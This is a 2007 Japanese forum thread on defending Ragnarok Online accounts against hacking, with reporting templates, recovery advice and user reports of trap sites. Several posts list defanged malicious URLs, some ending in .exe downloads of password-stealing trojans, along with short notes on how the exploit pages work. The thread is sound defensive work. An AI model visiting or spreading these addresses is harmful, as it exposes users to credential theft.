全部 1- 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 最新50


アカウントハック総合対策スレ7
1 名前:どり ★:07/04/25 22:18 ID:???0
アカウントハックに関する情報の集積・分析を目的とするスレです。
被害や攻撃等のアカウントハックの具体的事例に関して扱います。
重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

・ 関連&参考情報アドレス (>>2)
・ 報告用&質問用テンプレ (>>3, >>4)
・ アカウントハック対応の要点とFAQ (>>5)
・ 安全対策の簡易まとめ (>>6)

■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立て依頼は>>970がしてください。反応がなければ以降10ごとに。

2 名前:どり ★:07/04/25 22:18 ID:???0
【一般的話題用】
セキュリティ対策、質問・雑談スレ2
 http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

【過去スレ】
アカウントハック総合対策スレ6
 http://gemma.mmobbs.com/test/read.cgi/ragnarok/1173963316/
アカウントハック総合スレ 5
 http://gemma.mmobbs.com/test/read.cgi/ragnarok/1170419695/
アカウントハック被害報告スレ4
 http://gemma.mmobbs.com/ragnarok/kako/116/1164984508.html.gz
アカウントハック被害報告スレ3
 http://gemma.mmobbs.com/ragnarok/kako/116/1160787177.html.gz
アカウントハック被害報告スレ2
 http://gemma.mmobbs.com/ragnarok/kako/114/1147966576.html.gz
アカハック被害報告スレ
 http://gemma.mmobbs.com/ragnarok/kako/107/1075385114.html.gz

【参考アドレス】
・ROアカウントハック報告スレのまとめ?サイト
 http://sky.geocities.jp/vs_ro_hack/
・安全の為に (BSWikiより)
 http://smith.xrea.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
 http://lineage.nyx.bne.jp/

【このスレでよく出てくるアプリケーション】
・PeerGuardian2
 http://sky.geocities.jp/vs_ro_hack/pg2.htm

【PCにウィルス対策ソフトを導入してない方へ】
・Kaspersky Internet Security 試用版
 http://www.just-kaspersky.jp/products/try/
・カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
 http://www.kaspersky.co.jp/scanforvirus/
・NOD32アンチウイルス体験版
 http://www.canon-sol.jp/product/nd/trial.html

3 名前:どり ★:07/04/25 22:19 ID:???0
【投稿の際の注意】
・アカハックアドレスはMMOBBSでは禁止単語になっています。
 加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
 .(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレ等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。提供した情報の量と質
 に応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません

----------報告用テンプレ----------
● 実際にアカウントハックを受けた時の報告用

【      気付いた日時          】 (被害に気付いた日時)
【不審なアドレスのクリックの有無 】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【他人にID/Passを教えた事の有無】 (Yes/No)
【他人が貴方のPCを使う可能性の有無】 (Yes/No)
【    ツールの使用の有無      】 (Yes/No、Yesの場合はそのToolの説明)
【  ネットカフェの利用の有無    】 (Yes/No)
【     OS    】 (SP等まで書く)
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【hosts変更】(有/無 [有りの場合は最終更新は何時ごろか])
【PeerGuardian2導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】
(被害状況を詳しく書く)

4 名前:どり ★:07/04/25 22:19 ID:???0
● 怪しいアドレス?を踏んだ時用

【  アドレス   】 (ドット(.)を■等で置き換える事。h抜き等は駄目)
【気付いた日時】 (感染?に気付いた日時)
【     OS    】 (SP等まで書く)
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【hosts変更】(有/無 [有りの場合は最終更新は何時ごろか])
【PeerGuardian2導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】
(『怪しいアドレス』との判断した理由、症状を詳しく書く)

5 名前:どり ★:07/04/25 22:19 ID:???0
【アカウントハック対応の要点とFAQ】
以下は要点となります。詳細な物は BSWikiの『安全の為に』が参考になると思われます。

● 『アカウントハックアドレスを踏んだ』もしくは『ウィルスが見つかった』場合
 1) 速やかに感染PCのネットワークケーブルを外す
 2) 『安全な環境』から諸々のパスワードを変更
 3) ウィルス駆除 もしくは OSのクリーンインストールやPCの再セットアップを行う

注)
 ・安全確認されるまでNetworkに接続・ROクライアント起動・公式にログインは厳禁
 ・各種メッセンジャーソフトやメールクライアントの起動も避ける
 ・変更するべき物は以下のとおり
  『GungHo-IDパスワード』『アトラクションIDパスワード』『キャラパスワード』『メールアドレス』
 ・アンチウイルスソフトの過信は禁物。自信がなければ再セットアップを第1選択枝とする事
 ・対応は慎重かつ迅速に行う事。早期に対応できればアカウントハックを防げる確率が上がる

● 関連FAQ
・『安全な環境』ってどんな物?
  ウイルスの感染が無いと思われる環境です。別PCや据置型ゲーム機、1CD Linux等が挙げられます。
  インターネットカフェ等不特定多数が使用する環境は危険性の高い環境です。
  また知人友人のPCもインターネットカフェ並の危険があるものと考えるべきです。
  信頼できる友人にパスワード変更を依頼するのは最後の手段であり、安全な環境を
  構築次第、再度パスワードを変更しましょう。
・オンラインウイルススキャンをしたいんだけど、やっぱりネットにつないじゃ駄目?
  駄目です。
・アンチウイルスソフトでウイルスが見つからないのでもう大丈夫だよね?
  100%の保証は出来ません。ウィルスが見つからなかった場合、チェックに使った
  アンチウィルスソフトでは発見出来なかっただけです。本当にウィルスが居ないのか、
  それとも検知を免れているだけなのかは判りません。
  自信が無い場合はHDDをフォーマットの上、PCの再セットアップを考えるべきです
・1CD Linuxってなに?
  CDを入れてPCを起動するだけでLinux環境が起動しちゃうというものです。
  ある意味クリーンインストールに近い状態なので汚染はゼロといえますし、
  そもそもWindowsではないのでアカウントハックウイルスも働きません。
  大概はWindows類似のデスクトップ環境やWebブラウザも組み込まれているので
  パスワード変更作業くらいなら問題なく出来ます。
  "KNOPPIX" や "Ubuntu"が人気が有ります。

6 名前:どり ★:07/04/25 22:19 ID:???0
【安全対策の簡易まとめ】
以下は要点となります。higaitaisaku.comさんの『被害対策』→『転ばぬ先の杖』
(http://www.higaitaisaku.com/korobanu.html)が参考になるでしょう。
『ROアカウントハック報告スレのまとめ?サイト』や
BSWikiの『安全の為に』も参考になると思われます。

●基本
 ・定期的なMicrosoftUpdate及び、各種ソフト(各種Player、Reader等)のアップデート
 ・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新
 ・パーソナルファイアウォールソフトの導入
 ・アドレスをホイホイ踏まない。よく確認する
 ・出所の怪しいプログラムやスクリプトを実行しない

●応用
 ・IEの使用を止め、他のブラウザに乗り換える(Firefox、Opera)
 ・IEコンポーネント使用のブラウザを使う(セキュリティ設定が容易な物が多い)
 ・信頼できるSite以外ではスクリプトやActiveXを切る
  :インターネットオプションのセキュリティの部分で設定可能
 ・偽装jpg対策(IE7とIE6SP2限定。IE6SP1以前では出来ない)
  :インターネットオプション→セキュリティ→レベルのカスタマイズ
   →「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする

7 名前:(^ー^*)ノ〜さん:07/04/25 22:26 ID:x6J3crh40
7get

8 名前:(^ー^*)ノ〜さん:07/04/25 22:33 ID:xzVsMz0j0
・以下、アカウントハックを面白おかしくおおげさに対応するスレをお楽しみ下さい

9 名前:(^ー^*)ノ〜さん:07/04/25 22:44 ID:O1SGHZOT0
うわぁ?なんてことだ?

10 名前:(^ー^*)ノ〜さん:07/04/25 22:51 ID:5m9Rb6CI0
blogを追っていたら、こぉ〜んなものを見つけてしまった!どうしよう……?

11 名前:(^ー^*)ノ〜さん:07/04/25 23:23 ID:XyEv0Jlt0
>>8-10
テンプレをお読み下さい。

>※ ネタや程度を超えた雑談・脱線はご遠慮ください
>
>【一般的話題用】
>セキュリティ対策、質問・雑談スレ2
> http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

12 名前:(^ー^*)ノ〜さん:07/04/26 00:11 ID:+KbPU//70
いつものキチガイか

13 名前:(^ー^*)ノ〜さん:07/04/26 03:25 ID:iAN4cbSy0
Forsety wiki で垢ハックらしきURL発見。
よく見る住人さんは注意を。

【  アドレス   】 www■getamped-garm■com/chaos

踏んじゃったので用心の為再インスコしてきます…(´・ω・`)

14 名前:(^ー^*)ノ〜さん:07/04/26 10:18 ID:6zk3nbrl0
.htaccessでOFSfb*.ppp11.odn.ad.jpからのPOSTを禁止したいけど
他への影響もでかいしイマイチスマートにいかないなぁ。

OFSfb-21p4-127.ppp11.odn.ad.jp 210.197.151.127
OFSfb-22p1-187.ppp11.odn.ad.jp 210.197.152.187
OFSfb-12p1-64.ppp11.odn.ad.jp 211.3.148.64
OFSfb-21p3-184.ppp11.odn.ad.jp 210.197.150.184
OFSfb-23p3-108.ppp11.odn.ad.jp 210.197.158.108
OFSfb-21p4-156.ppp11.odn.ad.jp 210.197.151.156
→210.197.144.0/20?

なんかこのへんいい方法ありますかね。

15 名前:(^ー^*)ノ〜さん:07/04/26 10:34 ID:NL2AXhzN0
>>14
これでどう?実験してないので上手く行くかわからないけど。

SetEnvIfNoCase Remote_Host "OFSfb-.+\.odn\.ad\.jp" virODN
<Limt POST>
Order Allow,Deny
Deny from env=virODN
</Limit>

16 名前:(^ー^*)ノ〜さん:07/04/26 10:39 ID:Xwz+SYtR0
>13
南無。
getamped-garmはまとめサイトの危険hostsに載ってる既知の危険アドレスで
スレ調べたら1月末に報告が上がってた。

hosts更新やPG2を導入してたら踏んでも問題なかったはずなので、再インスコが
終わったら、これらの対策もするがよろし。
対策はしてたけどhostsの更新をサボってて踏んでしまったというなら、自動更新
スクリプトを導入した方がいいかもね。

17 名前:(^ー^*)ノ〜さん:07/04/26 10:40 ID:6zk3nbrl0
ホスト名の正規表現でマッチングはパフォーマンスによろしくないとか
そういう表記を見たんだけどそもそも.cnとかそのへんdenyしてるのと
あんまり変わらないかね?

18 名前:(^ー^*)ノ〜さん:07/04/26 14:21 ID:m8KUbqAG0
前スレ777にあったドメインby福建人
BBSにオーストラリア経由で書き込み

>明日24日はBOT露店不買運動の日です

>先週はsesにお邪魔しましたが
>今週は自鯖で露店を出す予定です。

>本日追加したBOT産販売店
http://www■23styles■com/bbs
>寵行天下:2007/4/26(Thu)12:50 [38]

IPアドレス 165.228.132.11
ホスト名 way-cache1-1.cache.telstra.net
IPアドレス
 割当国 ※ オーストラリア (AU)

ソースチェッカーかけたら
危険!VBS/Psymeを発見! とでました。

19 名前:(^ー^*)ノ〜さん:07/04/26 15:34 ID:lZG4P2hW0
フリーサービス使った垢ハック、zhangweijp入り。
すでにあちこちヒットする。
www■dentsu■itgo■com/skating/mao_asada■html

サブドメイン名とか見るといかにも福建人っぽい。
素で読むと電通(dentsu)だからね。

また錯誤狙いなんだろうな、一応運営に苦情を発射済み。

20 名前:(^ー^*)ノ〜さん:07/04/26 16:21 ID:DfOHjUe60
>>19
既に404、対応早いな。
それにしても、フィギュア関係狙いとは、連中もチケット関係フィッシングに進出する気でもあるのか。
あの界隈は、RS席を筆頭にダフ屋紛いの高値取引が横行している状態だし。

21 名前:前スレ950,960,991:07/04/26 18:24 ID:CKVAVRy80
トレンドマイクロから返事が来ました。
次回のウイルスパターンファイルで検出可になるとの返事でしたが、早速対応したようで
先ほどリリースされた最新パターンで下記のファイルすべて検出できることを確認しました。
(前スレ991と一部報告が被りますが)

>前スレ950
www■gomeodc■com/mmkk■com  (ウイルス名:TSPY_NILAGE.IH)
www■vviccd520■com/img/mmdd■exe  (ウイルス名:TSPY_NILAGE.HU)
上記2つに含まれる22.exe  (ウイルス名:TSPY_NILAGE.BJD)

>前スレ960
www■blog-livedoor■net/boss/mangame■exe  (ウイルス名:TROJ_MARAN.JV)

22 名前:(^ー^*)ノ〜さん:07/04/26 18:52 ID:fZPSdoMZ0
>>18
www■ezbbsy■com/bbs/ro.exe
いつものMaranでした。

23 名前:(^ー^*)ノ〜さん:07/04/26 21:14 ID:97PVjrWn0
>>17
あなたのサイトに毎日数万人規模で人が来るなら影響あるかもな

24 名前:(^ー^*)ノ〜さん:07/04/26 21:55 ID:XLu4aHXn0
>>23
ページビューで50kぐらいだ。迷うな…。

25 名前: ◆sp4Sh9QXGI:07/04/27 01:20 ID:fgwy01EV0
ご無沙汰してます、中の人です。
スレがいいタイミングで両方(こちらと雑談)とも移行していましたので
まとめサイトに追加させていただきました。

せっかくなので、かねてから変更しようと考えていたサイト名も
ROアカウントハック報告スレのまとめ?サイト

ROアカウントハック対策スレのまとめサイト
になりました。とは言え、あまり変わってません。

それでは。

26 名前:(^ー^*)ノ〜さん:07/04/27 11:24 ID:TGdugAMZ0
>>18
同URIの書き込み被害は当方にも。

IPアドレス: 165.228.128.11
ホスト名: civ-cache1-1.cache.telstra.net

wikiだったので既存URIの書き換えされて、ましてや…自分で踏んでしまった。
PCアップグレード前だったので購入したカスペをインストールしてなかったのが悔やまれる…。

感染はしてないっぽいけど…なんともなぁ、福建のヤツ、手当たり次第だね。

27 名前:(^ー^*)ノ〜さん:07/04/27 13:22 ID:+E+tVD7s0
【      気付いた日時          】 4-27
【不審なアドレスのクリックの有無 】 記憶なし
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 世界のme
【使用ブラウザ 】 IE5.5
【WindowsUpdateの有無】 かなり前
【 アンチウイルスソフト 】 antivir
【その他のSecurty対策 】 無し
【 ウイルススキャン結果】 えいちてぃーえむえる/exploit.mえいちてぃーえむえる発見
【スレログやテンプレを読んだか】 読んだ
【hosts変更】無し
【PeerGuardian2導入】無し
【説明】IEを起動したらいきなり笑点のオープニングみたいな音楽が流れて、
    (実は昨日も鳴ったんですが、気のせいかと思って放置)
    ウイルススキャンしたらこのウイルスが検出されました。
    このスレに辿り着く前に、ウイルスを削除だか検閲だかをして、
    各種パスワード変更。
    あと、不思議な事に、IDはオートコンプリート?ですか、あれで、
    IEに記憶されてて画面開くとパス入れるだけになってるんですが、
    フリーメールも他のIDやパスもオートコンプリートからそっくり全部削除されてた。

28 名前:(^ー^*)ノ〜さん:07/04/27 13:54 ID:sZ3uFTFb0
>>27
この説明読んどけ
http://www.viruslistjp.com/viruses/encyclopedia/?virusid=48656

対処:HDDフォーマットしてOS入れなおせ。以上。

理由:情報が少なく、セキュリティ意識も低い状況の為、他にも多数危険な要素があることが想定される。
    確実な対応はOSの入れなおしと、セキュリティ対策ソフトの導入となる。

備考:MEに関してはWindowsUpdateの提供が終了しており、危険性が高い。XPへの更新をお薦めする。

29 名前:(^ー^*)ノ〜さん:07/04/27 14:08 ID:61XrifEm0
MEもだがIE5.5ってのも…、とにかくその状態はこれからも心配だから丸ごと入れ直しお勧め

30 名前:(^ー^*)ノ〜さん:07/04/27 14:09 ID:iyV1MmIj0
>>18,26

> IPアドレス: 165.228.128.11
> ホスト名: civ-cache1-1.cache.telstra.net
BBQで焼かれ済みの串だね。

>>27
文書いてる内に28が簡潔にまとめてくれたのでお蔵入り。でも内容は28の言うところと同じ。
そもそも、MeやIE5.5でネットワークに繋ぐなんて恐ろしい事出来ません。

>【 ウイルススキャン結果】 えいちてぃーえむえる/exploit.mえいちてぃーえむえる発見
いや、そんなところを分かりにくく書いても意味が無いってばさ。
絶対言い換えるべきはアカハクアドレスやドメイン名だけで、それ以外は無意味。
・・と最近思った事をこの機会だから言ってみる。マニュアル脳に成ってしまうのは
忌むべき事だ。

31 名前:27:07/04/27 14:44 ID:+E+tVD7s0
>>28
ありがとうございます。
ちょっと見たらハックツールなんて言葉が・・・
恐いので再インストします。
meに愛着があるんですが、何かあると恐いので
とりあえずこのパソコンは止めておきます。感謝

>>29
全然頓着ないので5.5のままでした・・
久々にさっぱりしてみます。感謝

>>30
>そもそも、MeやIE5.5でネットワークに繋ぐなんて恐ろしい事出来ません。
そうなんですか?!んががが恐い。
大したデータも入ってないから・・・とあまり気にしてなかったんですが、
恐いので改めます。
えいちてぃーえむえるの件、なるほど納得です。
以後気をつけます。感謝

32 名前:27:07/04/27 14:58 ID:+E+tVD7s0
検索してみたら、一昨日このウイルスが張られて騒いでるスレが
ありました。
場所はフジ実況だったけど、多分ニュー速あたりに誰かが張り直したのを
踏んだ悪寒・・・

33 名前:(^ー^*)ノ〜さん:07/04/27 16:31 ID:dT+4h6vi0
>25
更新乙です。
前スレの終わりぐらいに何点か要望が挙がってたので、可能なら対応を希望。

>31
セキュリティホールを塞げないOSだと、脆弱性を利用したウィルスの亜種が次々と
作成されると、アンチウィルスソフトが検出できなければ簡単に感染する。

これがXPとかならWindowsUpdateで穴を塞げるので、亜種が検出出来なくても
被害は出ない。

MEやIE5.5が論外と言われるのはこういう事が理由。
さらにロクに対策を取ってなければ、それはハッカーに感染してくださいと
言ってるようなもの。

34 名前:(^ー^*)ノ〜さん:07/04/27 18:58 ID:bGaP98a10
【  アドレス   】 http://www■soultakerbbs■net/388465/
【気付いた日時】 07/04/27 18時頃
【     OS    】 XP SP1
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 基本自動でやってます
【 アンチウイルスソフト 】 トレンドマイクロ ウィルスバスター2006
【その他のSecurty対策 】 ルータ
【 ウイルススキャン結果】 感染時にEXPL_ANICMOO.GEN aniカーソル系の感染を確認
             その後のフル検索では問題なし
【スレログやテンプレを読んだか】 今から読みます
【hosts変更】無
【PeerGuardian2導入】無
【説明】
うっかり踏んでしまった・・しかもRO起動中に
ウィルスバスターが感染確認ウィンドウ出してきたので
とりあえず緊急ロックで遮断して、駆除
その後aniカーソルの脆弱性修正アップデートしたけど・・・
再インストールした方が良いですかね?

35 名前:(^ー^*)ノ〜さん:07/04/27 19:00 ID:Oq+suEc70
>>34
バスターが反応したなら大丈夫っぽい気がするが。
WinUpdateが自動となってるけど、ani脆弱性のUpdateはされてなかったってこと?

36 名前:34:07/04/27 19:04 ID:bGaP98a10
自動にしてるけど念のため、そのアップデートだけファイル落として個別にやり直ししたのです。
たぶん自分でも大丈夫と思ったけど、不安なもんですね

37 名前:(^ー^*)ノ〜さん:07/04/27 19:12 ID:k0pwDN4z0
>>35
SP1になってるのは気のせいかね。

SP2じゃないとその辺りのUpdateは利用できないんじゃ。

38 名前:34:07/04/27 19:15 ID:bGaP98a10
失礼、書き間違いです。SP2入れてました。

39 名前:(^ー^*)ノ〜さん:07/04/27 21:06 ID:Oq+suEc70
なら「多分」大丈夫だと思う。
心配なら再インストールするしかない。

40 名前:(^ー^*)ノ〜さん:07/04/27 23:50 ID:ieyYyRj70
最近勝手にキャラクターのパスが変更されてるんだけど・・・
これって垢ハック?

41 名前:(^ー^*)ノ〜さん:07/04/27 23:52 ID:b71WEu4e0
パスが変わっているだけ?

42 名前:(^ー^*)ノ〜さん:07/04/28 00:01 ID:KHDfH+D90
>>40
誰かに自キャラのIDとパスを教えたりはしていませんか?
踏んだかどうか定かでない場合の相談とか、なんとなく不安なんだけどみたいな相談は、LiveROへ。

セキュリティ対策、質問・雑談スレ2
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

43 名前:(^ー^*)ノ〜さん:07/04/28 01:14 ID:HMI5ly/P0
運営側が勝手に変えたりはしないから、まぁアカハックでいいんじゃないか。
知り合いにパス教えるとかは論外として。

44 名前:(^ー^*)ノ〜さん:07/04/28 01:34 ID:ln7jxRpF0
最近ってことは継続的に変わってるって事で、それでどうやってROしてるの?

45 名前:(^ー^*)ノ〜さん:07/04/28 03:16 ID:paisq1Ch0
>>34 やいくつかのサイト、およびlovejpjpが新型に差し替わってるね。
スクリプトの仕込みが全く同じなので同一犯。

iframeが2つ。
ani.htmあるいは直接test.curを踏むのは名前のとおりaniカーソル。
ms06014.htmは名前のとおりActiveXコントロールの奴だけど、
0x80を足したUS-ASCIIなので一見読めない(& 0x7fすれば読める)。
降ってくるexeはlovejpjp以外はMaran。

以下はjROとは関係ない話。
lovejpjpだけexeが全く異なる(前スレの22.exeと基本的には同じ)。
どうもターゲットは台湾のGamaniaの模様
(台湾ではリネージュ、マビノギ、メイプルストーリーなど
NCSoftやNexonのコンテンツもGamaniaが運営している)。

46 名前:(^ー^*)ノ〜さん:07/04/28 04:34 ID:XcRNijCJ0
すみません。ウイルスに感染してしまったのですが、
こういう場合は再インスコしろという回答が出ているのですが、
再インスコとか再インストールのことでいいのでしょうか?
もしそうなら再インストールのやりかたを教えていただけないでしょうか?

47 名前:(^ー^*)ノ〜さん:07/04/28 04:57 ID:/Kklx6D+0
再インスコ=再インストールで合っているが、そのやり方についてはスレ違いだし、
そこまで初心者の相手などしていられない。
メーカー製PCならついてきたCDとか説明書とか読め。
でなければ親なり友人なり、そのPCを組み上げた人間に相談しろ。

48 名前:(^ー^*)ノ〜さん:07/04/28 04:58 ID:259a9NTr0
PCについてきたリカバリーCDかOSのCDを入れて再起動。
で、うまくいけばラッキー。

これでうまくいかないような場合、
たぶんPCに詳しくないあなたから、適切に情報を聞き出して
どうやればいいかの手順を示すことは、我々には困難かと。

「windows 手順 再インストール」くらいでぐぐると、
それっぽいページは見あたるので、参考にどうぞ。

49 名前:(^ー^*)ノ〜さん:07/04/28 05:00 ID:259a9NTr0
>>46
以降、なにか書き込みたくなったら

【一般的話題用】
セキュリティ対策、質問・雑談スレ2
 http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

のほうへどうぞ。

50 名前:(^ー^*)ノ〜さん:07/04/28 07:40 ID:CtI5/KAK0
毎度おなじみ福建人の新ドメイン。

Domain Name ..................... editco-jp■com
Expiration Date ................. 2008-04-26 11:43:24

51 名前:(^ー^*)ノ〜さん:07/04/28 11:37 ID:QVpkxVVx0
Lisa鯖じゃ、どこかのGVギルドのマスターが垢ハックされて
ゴス装備と他に高額装備がぱくられたらしい。

52 名前:(^ー^*)ノ〜さん:07/04/28 12:34 ID:eFsXe/eu0
>>51
鯖2位の同盟のマスターだな
+7ゴスフォマル +8天使メイル +9狐マント +9廃靴とか他色々
以前も誰かの+7ゴスグリッタが南無ってる

53 名前:(^ー^*)ノ〜さん:07/04/28 12:55 ID:KHDfH+D90
>>51-53
ザマーミロとは思うが、スレ違いだ。雑談はLiveROに移動しようじゃないか。

セキュリティ対策、質問・雑談スレ2
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

54 名前:(^ー^*)ノ〜さん:07/04/28 12:56 ID:8Y+M+YrX0
LiveROだからって何でもありだと思うなよ

55 名前:(^ー^*)ノ〜さん:07/04/28 12:58 ID:ZSVVFMg/0
>>54RO専用板なにゅ缶で何をほざいてるんだ

56 名前:(^ー^*)ノ〜さん:07/04/28 18:35 ID:+Migv6SB0
ウィルス1つで同盟崩壊、鯖のパワーバランスが崩れる可能性があると考えれば、強ちスレ違いと言えなくもないな。
ゲームの知識だけでなく、PCやInternetに関しても学ぶように心がければ良いということ。

57 名前:(^ー^*)ノ〜さん:07/04/28 19:57 ID:gSD6TJD60
金ゴキとかで俺tueeeしてた奴が取られたりしたら復帰する気にならんだろな

58 名前:(^ー^*)ノ〜さん:07/04/28 20:16 ID:ta7/UmNz0
それは見くびりすぎってもんだぞ。
垢ハックで引退するようなヤツはもう今のROにはいない。

59 名前:(^ー^*)ノ〜さん:07/04/28 20:46 ID:gCFzdw6T0
いや被害者は結構引退してる。そして一人が止めた事によって仲間が釣られて引退なんてのも結構見てる。
自分の中のイメージをこういうスレで語るのは止せ。

60 名前:(^ー^*)ノ〜さん:07/04/28 20:52 ID:LEEM4TsJ0
その9割が復帰して、全員廃装備を持っている。

61 名前:(^ー^*)ノ〜さん:07/04/28 23:57 ID:ta7/UmNz0
そうは言うが一年前と人数変わってないのがな。
変わってないのは全部BOTのせいというのが世間の判断らしいが、
それはどうかなと思うがどうでもいい話でまじごめんなさい終わり。

62 名前:(^ー^*)ノ〜さん:07/04/29 00:41 ID:rXlmlVJR0
すみません、先ほど自分が活動してる鯖のGvWikiの移転先を踏み、白紙のページが出てきました。
ソースを覗いててみると、サイズ0で別htmファイルのURLが書かれていました。
マカフィーでは何も反応は出なかったのですが、不安なのでどなたか調べていただけないでしょうか?
ttp://www■blog-livedoor■net/game/

63 名前:(^ー^*)ノ〜さん:07/04/29 00:44 ID:ytZha9IO0
>>62
-- 「2007/04/01 6:54」のキャッシュをチェックしています。 --
※このアドレスは危険URLのひとつです。
ブラクラチェックが終了しました。


南無、と。

64 名前:(^ー^*)ノ〜さん:07/04/29 00:44 ID:BL7NJQvs0
それは垢ハックアドレスです。
>>2-6を読んで対処しましょう。

65 名前:(^ー^*)ノ〜さん:07/04/29 00:45 ID:CliIH5iT0
>>62
ウィルスベンダーが休みのこの時期に無用心なお前さんはネット控えた方がいいんじゃ無いか?
GWでウィルス対策ソフトのパターン更新がお休みの可能性がある

66 名前:(^ー^*)ノ〜さん:07/04/29 01:20 ID:6intQzD10
>>52
それ狼だな
天使グリッタとゴスグリッタがやられて、それを購入した別のプレイヤーが
二種類のグリッタを転売してたので問題になった
垢ハックは当然最低だが、こういうモラルのない肉入りも十分最悪だな

67 名前:(^ー^*)ノ〜さん:07/04/29 01:40 ID:9Kg6aRQ50
>>62
罠サイトの危険性をたずねるときは、あなたの環境を晒すことも重要ですよ。
(テンプレ>>4による報告推奨)

★理由★
罠サイトを踏む→無条件で感染するような万能な罠があるなら、みんなそれを使います。
実際にはそんな万能な罠などあるはずもなく、特定の条件を満たしたときに罠が発動します。
その特定の条件というのが、OSの種類やバージョンであったり、ブラウザの種類であったり、
Windows Updateの有無であったり、スクリプトON/OFF状態であったり・・・

68 名前:(^ー^*)ノ〜さん:07/04/29 06:25 ID:ievbwVfC0
大型連休(中国にもある)で一気に更新されとる…。
とても全部は拾いきれないので1つずつ。

Upack圧縮Maran
先週(前スレの最後くらい)よりさらに検知しにくくなり、Dr.WEBが脱落。
相変わらず小さい(48kBほど)。
バスターはスルー、McAfeeは捕捉。Nortonは未確認。
他ではAntiVir、Avast!、BitDefender、Kaspersky、NOD32あたりが捕捉。
www■ahatena■com/388465/svch.exe >>34
etc.
lovetw・zhangweijp系全域にわたって100匹は生息していると思われる既存の
Maranの多くが(犯人が忘れていなければ)新型に置換されていくものと思われ。

nPack圧縮Maran
圧縮が今ひとつ(74kBほど)だけど増加中。
そろそろベンダに対応されつつあるか?
バスターとMcAfeeがスルー。Nortonは未確認(たぶんだめ)。
他ではAntiVir、Avast!、BitDefender、Dr.WEB、Kaspersky、NOD32あたりが捕捉。
www■blog-livedoor■net/game/svch.exe >>62
etc.
こちらも増加中。Upackと併用していくのか比較検討中なのか今ひとつ不明。

これら新型はkasperskyではMaran.cjではなくMaran.ejとなるようです。

69 名前:(^ー^*)ノ〜さん:07/04/29 06:35 ID:ievbwVfC0
↑とりあえずSymantec、McAfee、Trendmicro、
Dr.WEB、K7(笑)には提出済み。

70 名前:(^ー^*)ノ〜さん:07/04/29 06:39 ID:blD47vu90
>>69
検体提出乙です

71 名前:(^ー^*)ノ〜さん:07/04/29 07:50 ID:0OmPfpzB0
しかしこんなゲームよくやってるよなお前等

72 名前:(^ー^*)ノ〜さん:07/04/29 08:45 ID:IaiFEihM0
俺はやってるが、ここにいるほとんどの人間は引退済のような気がする

73 名前:(^ー^*)ノ〜さん:07/04/29 09:20 ID:N6JVFa5S0
そだな、ウィルス報告受けて分析、検出、報告してる集団に見えるw

74 名前:(^ー^*)ノ〜さん:07/04/29 09:49 ID:IK0iOMmg0
各種Wiki管理者に、引退・休止者が多いのと同義。
要は、老後の道楽みたいなものだ。

75 名前:(^ー^*)ノ〜さん:07/04/29 12:36 ID:hpzX9TA3O
けどその人達のおかげで助けられてる人も多いんだし。感謝です。

76 名前:(^ー^*)ノ〜さん:07/04/29 17:28 ID:Ff/V3HQc0
仮想PC内の%TEMP%フォルダに9vx5715s.exeとかいう怪しげなファイルがいたので、
念のため、VIRUSTOTALに投げてみたら、MARANだった。
http://www.virustotal.com/vt/en/resultadof?4c5298ada2107715f2c598dcb4210e34

調査用環境のため、わざとWindows Updateしてなかったりするので
感染したのは別にいいんですが、どこのサイトを踏んだときに感染したのか不明。
検出率がものすごく悪かったので一応報告。
といってもどこのサイトか分からなきゃ意味ないか・・・

77 名前:(^ー^*)ノ〜さん:07/04/29 17:41 ID:TnFWAnes0
>>76
どこのサイトかわからなくても、検出率の悪かったものは、各社に検体提出することで意義はあると思います。
PiED等で、新種の圧縮形式かどうか確認してみるとかもありかもしれません。

78 名前:(^ー^*)ノ〜さん:07/04/29 17:42 ID:TnFWAnes0
あ、検体の提出先は、LiveROの方にまとめられているのを参照で。

セキュリティ対策、質問・雑談スレ2
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/7-8

79 名前:76:07/04/29 17:46 ID:Ff/V3HQc0
すみません。今から出かけますので、帰宅後提出しておきます。

80 名前:(^ー^*)ノ〜さん:07/04/29 18:23 ID:JjJgaoUg0
HeimdalWikiのGvG同盟関係(別窓)の所が
www■biglobe-ne■com/bbs に改変されていました。
